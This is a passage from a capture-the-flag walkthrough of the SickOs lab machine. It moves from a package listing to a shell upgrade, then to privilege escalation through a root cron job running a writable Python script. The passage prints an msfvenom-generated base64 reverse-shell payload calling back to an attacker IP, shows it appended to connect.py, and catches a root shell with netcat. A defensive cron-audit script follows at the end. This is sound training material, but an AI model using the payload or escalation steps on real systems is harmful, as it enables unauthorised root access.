ii mysql-common 5.5.46-0ubuntu0.12.04.2 MySQL database common files, e.g. /etc/mysql/my.cnf
ii mysql-server 5.5.46-0ubuntu0.12.04.2 MySQL database server (metapackage depending on the latest version)
ii mysql-server-5.5 5.5.46-0ubuntu0.12.04.2 MySQL database server binaries and system database setup
ii mysql-server-core-5.5 5.5.46-0ubuntu0.12.04.2 MySQL database server binaries
ii nano 2.2.6-1 small, friendly text editor inspired by Pico
ii ncurses-base 5.9-4 basic terminal type definitions
ii ncurses-bin 5.9-4 terminal-related programs and man pages
ii net-tools 1.60-24.1ubuntu2 The NET-3 networking toolkit
ii netbase 4.47ubuntu1 Basic TCP/IP networking system
ii netcat 1.10-39 TCP/IP swiss army knife -- transitional package
ii netcat-openbsd 1.89-4ubuntu1 TCP/IP swiss army knife
ii netcat-traditional 1.10-39 TCP/IP swiss army knife
ii ntfs-3g 1:2012.1.15AR.1-1ubuntu1.2 read/write NTFS driver for FUSE
ii ntpdate 1:4.2.6.p3+dfsg-1ubuntu3.1 client for setting system time from NTP servers
ii openssh-client 1:5.9p1-5ubuntu1.1 secure shell (SSH) client, for secure access to remote machines
ii openssh-server 1:5.9p1-5ubuntu1.1 secure shell (SSH) server, for secure access from remote machines
ii openssl 1.0.1-4ubuntu5.11 Secure Socket Layer (SSL) binary and related cryptographic tools
ii os-prober 1.51ubuntu3 utility to detect other OSes on a set of drives
ii parted 2.3-8ubuntu5.1 disk partition manipulator
ii passwd 1:4.1.4.2+svn3283-3ubuntu5.1 change and administer password and group data
ii patch 2.6.1-3 Apply a diff file to an original
ii pciutils 1:3.1.8-2ubuntu6 Linux PCI Utilities
ii perl 5.14.2-6ubuntu2.3 Larry Wall's Practical Extraction and Report Language
ii perl-base 5.14.2-6ubuntu2.3 minimal Perl system
ii perl-modules 5.14.2-6ubuntu2.3 Core Perl modules
ii php5 5.3.10-1ubuntu3.19 server-side, HTML-embedded scripting language (metapackage)
ii php5-cli 5.3.10-1ubuntu3.21 command-line interpreter for the php5 scripting language
ii php5-common 5.3.10-1ubuntu3.21 Common files for packages built from the php5 source
ii php5-gd 5.3.10-1ubuntu3.21 GD module for php5
ii php5-mcrypt 5.3.5-0ubuntu1 MCrypt module for php5
ii php5-mysql 5.3.10-1ubuntu3.21 MySQL module for php5
ii plymouth 0.8.2-2ubuntu31.1 graphical boot animation and logger - main package
ii plymouth-theme-ubuntu-text 0.8.2-2ubuntu31.1 graphical boot animation and logger - ubuntu-logo theme
ii popularity-contest 1.53ubuntu1 Vote for your favourite packages automatically
ii powermgmt-base 1.31 Common utils and configs for power management
ii ppp 2.4.5-5ubuntu1 Point-to-Point Protocol (PPP) - daemon
ii pppconfig 2.3.18+nmu3ubuntu1 A text menu based utility for configuring ppp
ii pppoeconf 1.20ubuntu1 configures PPPoE/ADSL connections
ii procps 1:3.2.8-11ubuntu6.3 /proc file system utilities
ii psmisc 22.15-2ubuntu1.1 utilities that use the proc file system
ii python 2.7.3-0ubuntu2.2 interactive high-level object-oriented language (default version)
ii python-apport 2.0.1-0ubuntu17.6 apport crash report handling library
ii python-apt 0.8.3ubuntu7.2 Python interface to libapt-pkg
ii python-apt-common 0.8.3ubuntu7.2 Python interface to libapt-pkg (locales)
ii python-chardet 2.0.1-2build1 universal character encoding detector
ii python-crypto 2.4.1-1ubuntu0.1 cryptographic algorithms and protocols for Python
ii python-dbus 1.0.0-1ubuntu1 simple interprocess messaging system (Python interface)
ii python-dbus-dev 1.0.0-1ubuntu1 main loop integration development files for python-dbus
ii python-debian 0.1.21ubuntu1 Python modules to work with Debian-related data formats
ii python-gdbm 2.7.3-1ubuntu1 GNU dbm database support for Python
ii python-gi 3.2.2-1~precise Python 2.x bindings for gobject-introspection libraries
ii python-gnupginterface 0.3.2-9.1ubuntu3 Python interface to GnuPG (GPG)
ii python-httplib2 0.7.2-1ubuntu2.1 comprehensive HTTP client library written for Python
ii python-keyring 0.9.2-0ubuntu0.12.04.2 store and access your passwords safely
ii python-launchpadlib 1.9.12-1 Launchpad web services client library
ii python-lazr.restfulclient 0.12.0-1ubuntu1.1 client for lazr.restful-based web services
ii python-lazr.uri 1.0.3-1 library for parsing, manipulating, and generating URIs
ii python-minimal 2.7.3-0ubuntu2.2 minimal subset of the Python language (default version)
ii python-newt 0.52.11-2ubuntu10 A NEWT module for Python
ii python-oauth 1.0.1-3build1 Python library implementing of the OAuth protocol
ii python-openssl 0.12-1ubuntu2.1 Python wrapper around the OpenSSL library
ii python-pam 0.4.2-12.2ubuntu4 A Python interface to the PAM library
ii python-pkg-resources 0.6.24-1ubuntu1 Package Discovery and Resource Access using pkg_resources
ii python-problem-report 2.0.1-0ubuntu17.6 Python library to handle problem reports
ii python-serial 2.5-2.1build1 pyserial - module encapsulating access for the serial port
ii python-simplejson 2.3.2-1 simple, fast, extensible JSON encoder/decoder for Python
ii python-twisted-bin 11.1.0-1ubuntu2 Event-based framework for internet applications
ii python-twisted-core 11.1.0-1ubuntu2 Event-based framework for internet applications
ii python-wadllib 1.3.0-2 Python library for navigating WADL files
ii python-xapian 1.2.8-1 Xapian search engine interface for Python
ii python-zope.interface 3.6.1-1ubuntu3 Interfaces for Python
ii python2.7 2.7.3-0ubuntu3.4 Interactive high-level object-oriented language (version 2.7)
ii python2.7-minimal 2.7.3-0ubuntu3.4 Minimal subset of the Python language (version 2.7)
ii readline-common 6.2-8 GNU readline and history libraries, common files
ii resolvconf 1.63ubuntu16 name server information handler
ii rsync 3.0.9-1ubuntu1 fast, versatile, remote (and local) file-copying tool
ii rsyslog 5.8.6-1ubuntu8.6 reliable system and kernel logging daemon
ii screen 4.0.3-14ubuntu8 terminal multiplexor with VT100/ANSI terminal emulation
ii sed 4.2.1-9 The GNU sed stream editor
ii sensible-utils 0.0.6ubuntu2 Utilities for sensible alternative selection
ii sgml-base 1.26+nmu1ubuntu1 SGML infrastructure and SGML catalog file support
ii squid 3.1.19-1ubuntu3.12.04.3 dummy transitional package from squid to squid3
ii squid-langpack 20111114-1 Localized error pages for Squid
ii squid3 3.1.19-1ubuntu3.12.04.3 Full featured Web Proxy cache (HTTP proxy)
ii squid3-common 3.1.19-1ubuntu3.12.04.3 Full featured Web Proxy cache (HTTP proxy) - common files
ii ssh-import-id 2.10-0ubuntu1 securely retrieve an SSH public key and install it locally
ii ssl-cert 1.0.28ubuntu0.1 simple debconf wrapper for OpenSSL
ii strace 4.5.20-2.3ubuntu1 A system call tracer
ii sudo 1.8.3p1-1ubuntu3.4 Provide limited super user privileges to specific users
ii sysv-rc 2.88dsf-13.10ubuntu11.1 System-V-like runlevel change mechanism
ii sysvinit-utils 2.88dsf-13.10ubuntu11.1 System-V-like utilities
ii tar 1.26-4ubuntu1 GNU version of the tar archiving utility
ii tasksel 2.88ubuntu9 Tool for selecting tasks for installation on Debian systems
ii tasksel-data 2.88ubuntu9 Official tasks used for installation of Debian systems
ii tcpd 7.6.q-21 Wietse Venema's TCP wrapper utilities
ii tcpdump 4.2.1-1ubuntu2 command-line network traffic analyzer
ii telnet 0.17-36build1 The telnet client
ii time 1.7-23.1 The GNU time program for measuring cpu resource usage
ii tmux 1.6-1ubuntu1 terminal multiplexer
ii ttf-dejavu-core 2.33-2ubuntu1 Vera font family derivate with additional characters
ii tzdata 2013g-0ubuntu0.12.04 time zone and daylight-saving time data
ii ubuntu-keyring 2011.11.21.1 GnuPG keys of the Ubuntu archive
ii ubuntu-minimal 1.267.1 Minimal core of Ubuntu
ii ubuntu-standard 1.267.1 The Ubuntu standard system
ii ucf 3.0025+nmu2ubuntu1 Update Configuration File: preserve user changes to config files.
ii udev 175-0ubuntu9.4 rule-based device node and kernel event manager
ii ufw 0.31.1-1 program for managing a Netfilter firewall
ii unzip 6.0-4ubuntu2.5 De-archiver for .zip files
ii update-manager-core 1:0.156.14.11 manage release upgrades
ii update-notifier-common 0.119ubuntu8.6 Files shared between update-notifier and other packages
ii upstart 1.5-0ubuntu7.2 event-based init daemon
ii ureadahead 0.100.0-12 Read required files in advance
ii usbutils 1:005-1 Linux USB utilities
ii util-linux 2.20.1-1ubuntu3 Miscellaneous system utilities
ii uuid-runtime 2.20.1-1ubuntu3 runtime components for the Universally Unique ID library
ii vim 2:7.3.429-2ubuntu2.1 Vi IMproved - enhanced vi editor
ii vim-common 2:7.3.429-2ubuntu2.1 Vi IMproved - Common files
ii vim-runtime 2:7.3.429-2ubuntu2.1 Vi IMproved - Runtime files
ii vim-tiny 2:7.3.429-2ubuntu2.1 Vi IMproved - enhanced vi editor - compact version
ii w3m 0.5.3-5ubuntu1.1 WWW browsable pager with excellent tables/frames support
ii wget 1.13.4-2ubuntu1 retrieves files from the web
ii whiptail 0.52.11-2ubuntu10 Displays user-friendly dialog boxes from shell scripts
ii whoopsie 0.1.33 Ubuntu crash database submission daemon
ii wireless-tools 30~pre9-5ubuntu2 Tools for manipulating Linux Wireless Extensions
ii wpasupplicant 0.7.3-6ubuntu2.2 client support for WPA and WPA2 (IEEE 802.11i)
ii xauth 1:1.0.6-1 X authentication utility
ii xkb-data 2.5-1ubuntu1.3 X Keyboard Extension (XKB) configuration data
ii xml-core 0.13 XML infrastructure and XML catalog file support
ii xz-lzma 5.1.1alpha+20110809-3 XZ-format compression utilities - compatibility commands
ii xz-utils 5.1.1alpha+20110809-3 XZ-format compression utilities
ii zlib1g 1:1.2.3.4.dfsg-3ubuntu4 compression library - runtime
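dpkg -l lists the installed software.
The list of installed software shows which method can be used to get an interactive shell.
Upgrading to an interactive shell
Python is installed here, so Python can be used to get an interactive shell.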
python -c "import pty;pty.spawn('/bin/bash')"
This gives a shell with better interactivity.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@SickOs:/usr/lib/cgi-bin$
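Privilege escalation via scheduled tasks
The scheduled tasks can be checked in /etc/crontab; rewriting the file that a task runs can then be used to escalate privileges.
Change into the /etc directory and list the relevant files.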
cd /etc
ls -liah cron*
131437 -rw-r--r-- 1 root root 722 Jun 20 2012 crontab
cron.d:
total 20K
131439 drwxr-xr-x 2 root root 4.0K Dec 5 2015 .
131073 drwxr-xr-x 90 root root 4.0K Jun 7 14:32 ..
131440 -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
132895 -rw-r--r-- 1 root root 52 Dec 5 2015 automate
132791 -rw-r--r-- 1 root root 544 Jul 2 2015 php5
cron.daily:
total 76K
131120 drwxr-xr-x 2 root root 4.0K Sep 22 2015 .
131073 drwxr-xr-x 90 root root 4.0K Jun 7 14:32 ..
131441 -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
132647 -rwxr-xr-x 1 root root 633 Jul 24 2015 apache2
132043 -rwxr-xr-x 1 root root 219 Apr 10 2012 apport
131253 -rwxr-xr-x 1 root root 16K Nov 15 2013 apt
131619 -rwxr-xr-x 1 root root 314 Apr 19 2013 aptitude
131958 -rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils
131121 -rwxr-xr-x 1 root root 256 Oct 14 2013 dpkg
131477 -rwxr-xr-x 1 root root 372 Oct 5 2011 logrotate
131973 -rwxr-xr-x 1 root root 1.4K Dec 28 2012 man-db
131978 -rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate
131273 -rwxr-xr-x 1 root root 249 Sep 13 2012 passwd
131640 -rwxr-xr-x 1 root root 2.4K Jul 2 2011 popularity-contest
131442 -rwxr-xr-x 1 root root 2.9K Jun 20 2012 standard
131942 -rwxr-xr-x 1 root root 214 Sep 11 2012 update-notifier-common
cron.hourly:
total 12K
131443 drwxr-xr-x 2 root root 4.0K Sep 22 2015 .
131073 drwxr-xr-x 90 root root 4.0K Jun 7 14:32 ..
131444 -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
cron.monthly:
total 12K
131431 drwxr-xr-x 2 root root 4.0K Sep 22 2015 .
131073 drwxr-xr-x 90 root root 4.0K Jun 7 14:32 ..
131432 -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
cron.weekly:
total 20K
131433 drwxr-xr-x 2 root root 4.0K Sep 22 2015 .
131073 drwxr-xr-x 90 root root 4.0K Jun 7 14:32 ..
131434 -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
131620 -rwxr-xr-x 1 root root 730 Sep 14 2013 apt-xapian-index
131972 -rwxr-xr-x 1 root root 907 Dec 28 2012 man-db
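Then go through the files one by one and look for anything exploitable. The usual things to check are which file a scheduled task executes and with what privileges; the corresponding file is then modified as needed.
The automate file contains sensitive information.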
cat automate
* * * * * root /usr/bin/python /var/www/connect.py
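This means: every minute, with root privileges, Python executes the file /var/www/connect.py. The approach is therefore to modify /var/www/connect.py in order to escalate privileges.
Use msfvenom to generate the corresponding payload.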
msfvenom -p cmd/unix/reverse_python lhost=192.168.52.134 lport=14447 -f raw
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAsICAgICAgc3VicHJvY2VzcyAgICAsICAgICAgb3MgICAgICAgIDsgICAgIGhvc3Q9IjE5Mi4xNjguNTIuMTM0IiAgICAgICAgOyAgICAgcG9ydD0xNDQ0NyAgICAgICAgOyAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICwgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICAgICBzLmNvbm5lY3QoKGhvc3QgICAgLCAgICAgIHBvcnQpKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAwKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAxKSAgICAgICAgOyAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAyKSAgICAgICAgOyAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp')[0]))"
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('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')[0]))
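Append this last line to the Python file.
First cd into the /var/www folder, then run vi connect.py, press o, paste the last line shown above, press Esc, and type :wq followed by Enter.
The line is now written to the file.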
cat connect.py
#!/usr/bin/python
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('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')[0]))
print "I Try to connect things very frequently\n"
print "You may want to try my services"
Start the listener
nc -lvnp 14447
listening on [any] 14447 ...
connect to [192.168.52.134] from (UNKNOWN) [192.168.52.142] 46898
ls
a0216ea4d51874464078c618298b1367.txt
whoami
root
Upgrade to an interactive shell
python -c "import pty;pty.spawn('/bin/bash')"
This completes the second solution as well.
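The weakness used above is a root cron job (the automate entry) that runs a file a lower-privileged account can edit. The following audit script is an added example, not part of the original walkthrough: it parses /etc/crontab or /etc/cron.d style text and reports privileged jobs whose referenced paths, or their parent directories, are owned by or writable for untrusted accounts. The function names and the temporary sample file are assumptions made for the example.

```python
"""Flag root cron jobs whose target files can be modified by other accounts."""
import os
import shlex
import stat
import tempfile


def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab or /etc/cron.d style text."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)      # @reboot user command
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
            continue
        parts = line.split(None, 6)          # m h dom mon dow user command
        if "=" in parts[0] or len(parts) < 7:
            continue                         # PATH=..., MAILTO=..., or malformed
        jobs.append((parts[5], parts[6]))
    return jobs


def weak_points(path, trusted_uids=(0,)):
    """Return reasons why an untrusted account could change what `path` runs."""
    reasons = []
    parent = os.path.dirname(path) or "/"
    for target, label in ((path, "path"), (parent, "parent directory")):
        try:
            st = os.stat(target)
        except OSError:
            continue  # a missing file is covered by the parent-directory check
        if label == "path" and (stat.S_ISCHR(st.st_mode) or stat.S_ISBLK(st.st_mode)):
            continue  # devices such as /dev/null appear in redirections
        if st.st_uid not in trusted_uids:
            reasons.append("%s owned by uid %d" % (label, st.st_uid))
        # Conservative: any group or world write bit is reported.
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("%s is group/world-writable (mode %o)"
                           % (label, stat.S_IMODE(st.st_mode)))
    return reasons


def audit(crontab_text, privileged_users=("root",), trusted_uids=(0,)):
    """Return (user, path, reasons) for each risky path run by a privileged job."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user not in privileged_users:
            continue
        try:
            tokens = shlex.split(command)
        except ValueError:
            tokens = command.split()
        for token in tokens:
            if not token.startswith("/"):
                continue
            reasons = weak_points(token, trusted_uids)
            if reasons:
                findings.append((user, token, reasons))
    return findings


def demo():
    """Constructed sample: a cron.d entry shaped like the one on the page."""
    workdir = tempfile.mkdtemp(prefix="cron-audit-")
    script = os.path.join(workdir, "connect.py")  # stand-in for /var/www/connect.py
    with open(script, "w") as fh:
        fh.write("print('placeholder job')\n")
    os.chmod(script, 0o666)                       # the weak setting being detected
    entry = "* * * * * root /usr/bin/python %s\n" % script
    # The current uid is trusted here so that only the mode bits are reported.
    return audit(entry, trusted_uids=(0, os.getuid()))


if __name__ == "__main__":
    for user, path, reasons in demo():
        print("%s job runs %s: %s" % (user, path, "; ".join(reasons)))
```

To close a finding, make the script and its directory owned by root and remove group and world write permission from both.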